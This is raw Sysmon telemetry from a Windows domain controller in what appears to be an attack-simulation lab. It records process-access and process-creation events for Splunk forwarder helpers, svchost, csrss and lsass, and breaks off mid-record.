13:19:19.044{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-44D7-6000-2501-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44D7-6000-2501-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.044{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-44D7-6000-2501-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:19.045{08A6967A-44D7-6000-2501-000000009A01}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-44D8-6000-2601-000000009A01}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44D8-6000-2601-000000009A01}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.185{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-44D8-6000-2601-000000009A01}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:20.186{08A6967A-44D8-6000-2601-000000009A01}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:27.373{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.d